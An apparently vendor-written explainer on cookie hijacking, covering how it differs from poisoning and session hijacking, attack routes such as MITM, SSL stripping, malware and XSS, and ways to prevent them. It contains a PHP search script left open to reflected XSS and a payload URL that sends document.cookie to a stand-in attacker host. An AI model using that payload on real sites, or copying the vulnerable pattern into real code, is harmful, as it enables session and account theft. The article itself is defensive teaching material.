Cookie hijacking

What is cookie hijacking?

In a cookie hijacking attack, the attacker steals HTTP cookies by eavesdropping on the communication between a user and a web application, gaining access to the user’s computer or web browser data, or gaining access to the web server memory. Attackers can perform cookie hijacking using techniques that include exploiting cross-site scripting (XSS) vulnerabilities, performing man-in-the-middle (MITM) attacks, exploiting buffer overflow vulnerabilities on web servers, or planting malware such as trojans.

Cookie hijacking vs. cookie poisoning

Cookie hijacking is often confused with cookie poisoning. In cybersecurity, the term poisoning is used to describe cyberattacks, where a malicious hacker injects malicious content into data while it is being transmitted. The term hijacking, on the other hand, is used for attacks where malicious hackers attempt to access (read) the data being transmitted.

• The aim of a cookie hijacking attack is to gain access to sensitive information stored in cookies. This information can be used later in other attacks. This type of attack can also be called cookie stealing or cookie theft.
• The aim of a cookie poisoning attack is to change the content of a cookie before it is received by a web application. Before poisoning a cookie, the attacker might also gain unauthorized access to the cookie content, but for some attacks, poisoning is possible even without accessing the content.

Note that you may see some web resources incorrectly using the term cookie poisoning for all attacks even loosely related to cookies, including various types of session hijacking and even session fixation or brute-force session prediction.

Cookie hijacking vs. session hijacking

The terms cookie hijacking and session hijacking are closely related but are not the same. Users’ session IDs, which are a common authentication mechanism for web apps, are most often handled using cookies. In these cases, session hijacking uses the same techniques as cookie hijacking. However, some web applications may handle session tokens in a different way, for example, using custom HTTP headers. For these apps, session hijacking attacks would use other techniques than cookie hijacking.

Cookies are also used for other types of functionality than just working with browser sessions, so they may contain sensitive information other than session IDs. While the hijacking techniques for such cookies will be the same as for web session cookies, the attacker may have a very different goal.

How does cookie hijacking work?

There are four main approaches to cookie hijacking: eavesdropping on user communication, gaining access to the user’s computer, gaining access to the user’s browser data, or gaining access to the web server memory used to store cookies.

Eavesdropping on communications – man-in-the-middle attacks

Cookie hijacking techniques often rely on man-in-the-middle (MITM) attacks. In the simplest case, when traffic is not encrypted, you only need a simple sniffer working in the same local network as the client to monitor network traffic for user connections and perform packet sniffing. This is especially common for public Wi-Fi networks.

If a website or web application uses exclusively encrypted connections, simple cookie sniffing won’t work, but there are other tricks that may be attempted. Some examples include:

• SSL stripping – the attacker tricks the web application into dropping an HTTPS connection and using the insecure HTTP protocol instead, which makes packet sniffing possible.
• SSL hijacking – the attacker generates a fake SSL certificate for the web application, and the victim then connects to a cloned or proxy application controlled by the attacker without any certificate warnings.
• DNS cache poisoning – the attacker tricks the victim’s DNS cache into storing manipulated domain information, and the victim’s browser is directed to a cloned or proxy application controlled by the attacker.

Gaining computer access through malware

In many cases, attackers attempt to infect user computer systems with malware such as trojans for the purpose of obtaining session information. A well-known example of this is the man-in-the-browser attack, where session identifiers are stolen directly from the user’s web browser.

Gaining cookie data through cross-site scripting

One of the most effective ways for an attacker to obtain access to a cookie is to use a cross-site scripting attack. If your website or web application has an XSS vulnerability, the attacker would start by tricking a user into visiting your vulnerable page through a specially crafted URL (typically through phishing). The victim is then redirected to a page that executes malicious client-side scripts in the client browser. The malicious JavaScript code accesses the user’s cookie and sends it to an attacker-controlled server.

Here is an example of a reflected cross-site scripting (XSS) vulnerability that could be used to steal a user’s cookies:

<?php
if (isset($_GET['search'])) 
{
  $results = search_database($_GET['search']);
  echo 'Results for "'.$_GET['search'].'":<br/>';
  foreach ($results as $result)
  {
    echo $result['result']."<br/>";
  }
}
?>

An attacker could inject malicious code into the search parameter to send the user’s cookie to a server they control:

http://example.com/search.php?search=<script>document.location='http://bad.example.com/thief.php?data='+document.cookie</script>

Cookie hijacking using buffer overflow

The content of cookies may also be accessed by unauthorized parties using buffer overflow attacks. If the web server runs software that is vulnerable to buffer overflow attacks, attackers may be able to read server memory containing data for the most recent cookies.

However, this type of attack is very rare and poses little security risk. Not many applications installed on web servers are vulnerable to buffer overflow, and even if they are, it would be a rare coincidence for a successful attacker to find and recognize cookies for a particular web page in memory data. Note that buffer overflow errors are extremely rare in web applications because most popular languages used to create web applications, such as PHP, Java, and JavaScript, don’t allow direct memory manipulation, so buffer overflows are not possible.

How to detect cookie hijacking?

Most cookie hijacking attacks target the user (for example, trojan-based attacks and man-in-the-middle attacks) and have nothing to do with the web application itself. These attacks can only be detected by monitoring user computers and user connections.

However, some cookie hijacking attacks are also made possible by cross-site scripting vulnerabilities. By scanning your web applications to find these vulnerabilities and then fixing the identified issues, you can reduce the risk of cookie hijacking. Read more about how to detect and fix XSS vulnerabilities here.

How to prevent cookie hijacking attacks?

To help prevent cookie hijacking attacks, follow these recommendations:

• As a web application developer or web server administrator, enforce SSL/TLS (HTTPS) for all your pages, not just the login page. For example, use HTTP Strict Transport Security (HSTS) and set security flags for cookies (Secure, HttpOnly). This will make it far more difficult to steal cookies and perform MITM attacks.
• To protect users from session hijacking attacks aimed directly at their computers and connections, promote the use of VPNs, especially for insecure connections, such as public Wi-Fi.
• If you use cookies for user authentication, consider using multi-factor authentication (MFA) as an additional security mechanism.